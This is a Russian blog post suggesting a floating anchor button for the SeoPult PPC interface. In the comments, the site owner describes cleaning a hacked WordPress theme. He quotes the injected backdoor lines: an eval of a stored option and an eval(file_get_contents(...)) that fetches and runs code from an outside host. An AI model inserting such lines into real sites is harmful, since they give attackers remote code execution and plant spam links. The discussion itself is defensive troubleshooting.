В SeoPult`е проигнорировали мою идею по улучшению интерфейса PPC

Являясь постоянным пользователем Яндекс.Директ (посредством интерфейса SeoPult PPC), ощутил острую необходимость в следующей доработке веб-интерфейса системы (необходимость возникла, когда количество как готовых объявлений, так и добавленных для создания объявлений поисковых запросов, перевалило за несколько сотен). Написал через внутреннюю почту вот такое письмо:

Здравствуйте, совет по улучшению интерфейса PPC. Если у пользователя большое количество объявлений (несколько сотен и более), то при добавлении новых ему очень неудобно каждый раз пролистывать страницу до того места, где заканчиваются объявления, и начинается список слов, ожидающих создания объявлений. (сюда нам нужно попадать каждый раз, когда создано новое объявление — оно ведь находится последним в списке.) Поэтому в окно SeoPult просится плаваюшая кнопка с якорем: находясь всё время у правой (или левой) границы экрана примерно посередине, она, при нажатии на неё, приведёт нас в то место на странице PPC, куда тольк очто добавилось последнее созданное нами объявление — в конец списка. Реализуется элементарно — с помощью якоря, зато сэкономит время и силы оптимизаторов.

Однако мне не пришло даже какого-нибудь ответа.

P.S. Спасибо Весельчаку, на сайте которого я нашёл инфу как убрать внешние ссылки в WordPress.


Рассказать друзьям:
Рубрики: Без рубрики
Вы можете отслеживать ответы на эту запись через RSS 2.0. Вы можете оставить отзыв, или Трэкбек с Вашего собственного сайта.
Комментарии (3)
  1. Здравствуйте. На некоторых страницах вашего сайта я обнаружил левые внешние ссылки спрятанные в точки (возможно сайт взломали).

    Например, скрытая ссылка есть на этой странице.

    Возможно, есть и еще (обычно – около 10-15 на сайт).
    Проверить мои слова вы можете любым сервисом для анализа исходящих ссылок со страницы, или открыв страницу в кеше яндекса (в коде страницы ищите «>.<»).
    Инструкцию по решению данной проблемы Вы можете прочитать в мой статье
    (одна из последних на сайте)

    Если моя статья вам поможет, буду признателен, если в благодарность вы поставите на мой блог ссылку :) Если Вы уже справились с данной проблемой – извините за беспокойство.

    • admin:

      Весельчак, спасибо, хакеры действительно пошарили. Но плагином AntiVirus я быстро вычислил очаг заражения: файл /themes/exotic-vacation/functions.php содержал код: if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false){ и ещё: if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false){

      Но самое главное!!!
      Я заново нашёл в Яндексе мою тему (Exotic Vacation), скачал с сайта wordpresse.ru, проверил файл functions.php — там был этот код!
      Затем я скачал эту же тему со второго сайта из результатов поиска (freewordpressthemes.ru) — на этот раз в файле functions.php ничего такого не было! Вот вам и пища для размышлений… На WordPresse.ru выложена для скачивания взломанная тема.
      Ваш сайт smartnotes.ru помог мне.
      P.S. C файлом .htaccess всё было в порядке. После перезаливки php-файла непрошенные внешние ссылки исчезли.
      Но, проверив весь свой сайт по Solomono (на какой странице какую внешнюю ссылку искать), понял, что одной перезаливкой темы их не убрать: на некоторых страницах (не пермалинках, а, например, http://www.andrews32.ru/2011/11 ссылки остались). Проверил в БД: в Wp-options была строка return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=32&n’));
      Скрипт обезвредил, но ссылки остались… Ваши идеи?

  2. Ну, скиньте мне архив движка — могу поискать. Либо! Если у Вас плагин кеширования работает — выключите его и перепроверьте ссылки. Вощзможно, просто кешировались.

Добавить комментарий

XHTML: Вы можете использовать, эти теги: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>